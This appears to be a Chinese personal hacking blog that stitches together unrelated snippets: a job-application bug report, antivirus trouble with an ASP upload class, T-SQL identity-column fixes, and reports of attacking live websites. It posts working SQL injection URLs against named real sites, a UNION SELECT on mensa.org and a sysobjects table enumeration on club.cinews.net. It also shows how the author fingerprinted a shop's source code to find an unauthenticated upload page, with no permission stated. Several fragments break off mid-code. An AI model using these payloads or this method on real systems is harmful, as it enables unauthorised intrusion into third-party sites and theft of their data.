wolfeng's blog

昨天看到鲁豫有约里采访几个中国的门萨成员，之后一时无聊，去了她们的官网，程序上有漏洞，但是却猜不到表名，load_file不到绝对路径而停滞不前，最大的无奈莫过于此，或许有人能猜到他的用户表吧，把注入点贴出来：http://www.mensa.org/nationalinfo.php?country=19%20and%201=2%20union%20select%201,user(),database(),4,5,6,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

前几天去应聘易才网的项目经理，他们让我写一个对易才网的个人意见。本来不想写了，不过经不住那边催促，勉强写了一篇，大部分的篇幅是对一个隐藏得比较深的漏洞的描述，昨天看的时候他们已经改了程序（这不代表就没了漏洞），所以把报告贴出来：
      总体来说，易才网结构合理，相应的电话确认用户身份的服务也很到位，我主要说几个问题，提几个建议。
问题一：冗余数据错乱
典型表现：http://augustsummer.blog.job1998.com/blog/index.asp
在该blog内的不同栏目里先后出现了 郭先生的个人空间 ，郭小姐的个人空间，郭川的个人空间 三个称谓。

这是我去年5月份写的，今天归整到这里：
歇完长假第一天上班，被通知说公司的网站发现被攻击的痕迹，证据是诺顿的隔离区里发现若干病毒文件，用pcanywhere连上web一看，隔离区里躺着几个upload.inc文件，这不是我们大家广为传用的无惧上传类吗，我的bbs和涉及到无组件上传的地方都用他，无惧啊，挺好的，用了无惧，还真对得起咱这张脸（大宝广告毒害后遗症）。
打开bbs目录，果然upload.inc被杀掉了，在看一下诺顿的版本，5月4号升的级，看来是在upload.inc里包含了诺顿新命名的病毒特征码，无惧，我所欲也，诺顿亦我所欲也，只有改这个inc文件了，最初的做法比较速成，下了一个asp免杀工具，然后把upload.inc加密，再copy到web下，没有被查杀，正得意之时，又被人告知说上传功能仍无法使用，一看报错信息：page重复定义——原来如此，我的上传页面里包含了conn.asp 和upload.inc等文件， conn.asp的第一行：
<%@LANGUAGE="VBSCRIPT"%>
而upload.inc加密后也必定包含

今天朋友给我一个卖保健品的网站，据说提交订单失效，疑似诈骗行为，遂查之。
   1、输入网址：http://www.bjp**.com，基本的安全做的不错，不存在简单的注入点，极有可能是一套开源的代码。
   2、登陆www.seeknot.com,利用其源码目录的查询功能反向查找源码名称，该网站有一新闻页面是：dongtai.asp，在www.seeknot.com输入dongtai.asp，列出6项源码，具体列表见：http://www.seeknot.com/result.asp?key=dongtai.asp&selected=1。
   3、进一步查询：该源码还有一页名称是fk.asp，在www.seeknot.com中输入fk.asp，其结果更上次结果取交集，确认源码为：秋叶购物商城V5.0(前台+后台演示+BBS) ，版本可能有出入。该源码的详细目录列表见：http://www.seeknot.com/showlist.asp?id=599
   4、下载秋叶购物系统源码，察看几个容易出现安全漏洞的关键点，发现存在类似动网6.0的上传漏洞，并且上传页面没有身份检测，即不用登陆，即可操作，上传页面为：http://www.bjp**.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg。

今天我自虐的对一处sql注入点进行注入,把最后的一个注入贴出来,比较变态:
http://club.cinews.net/stock/stockdetail.asp?stockname=跑马地''and%20(Select%20Top%201%20name%20from%20sysobjects%20where%20xtype=char(85)%20and%20status>0%20%20and%20name<>%27%65%63%61%72%64%6D%65%73%73%61%67%65%27%20and%20name<>%27%61%71%5F%73%63%6F%72%65%27%20and%20name<>%27%42%61%64%4C%69%73%74%27%20and%20name<>%27%42%61%6E%6B%55%73%65%72%4C%69%73%74%27%20and%20name<>%27banzhu%27%20and%20name<>%27card%27%20and%20name<>%27cdd_score%27%20and%20name<>%27chess_score%27%20and%20name<>%27cyfd%27%20and%20name<>%27dahu%27%20and%20name<>%27ddz_score%27%20and%20name<>%27ecard%27%20and%20name<>%27ecardlead%27%20and%20name<>%27face%27%20and%20name<>%27facelist%27%20and%20name<>%27friend%27%20and%20name<>%27friendlist%27%20and%20name<>%27geter%27%20and%20name<>%27gift%27%20and%20name<>%27goodslist%27%20and%20name<>%27guesslist%27%20and%20name<>%27gupiaoconfig%27%20and%20name<>%27gz_score%27%20and%20name<>%27job%27%20and%20name<>%27jq_score%27%20and%20name<>%27kehu%27%20and%20name<>%27message%27%20and%20name<>%27mj_score%27%20and%20name<>%27movice%27%20and%20name<>%27news%27%20and%20name<>%27pdk_score%27%20and%20name<>%27propertys%27%20and%20name<>%27sgjq_score%27%20and%20name<>%27stock%27%20and%20name<>%27stockbuylist%27%20and%20name<>%27stocklist%27%20and%20name<>%27stocknews%27%20and%20name<>%27sysmsg%27%20and%20name<>%27tlj_score%27%20and%20name<>%27user8%27%20and%20name<>%27userinfo%27%20and%20name<>%27users%27%20and%20name<>%27wq_score%27%20and%20name<>%27wzq_score%27%20and%20name<>%27xq_score%27%20and%20name<>%27yuelao%27)>0%20;--

说明一下:上面注入是探测sql内的所有数据表,型如and name <>%27card%27 之类的东西,是我一步一步的加的,加一个出一个表,呵呵,比较笨,笨死了,但是我喜欢.

功能：把test表中缺失的identity属性加上。
思路：把test表数据写如临时表，然后删除test表，重建test表，设置test的identity_insert为on，然后把临时表的数据导入test，直接在查询分析器了执行即可，呵呵。
select distinct * into #Tmp from test
drop table test
CREATE TABLE test (

A. 如有必要，重置当前标识值
下例在必要的情况下重置 jobs 表的当前标识值。

USE pubs
GO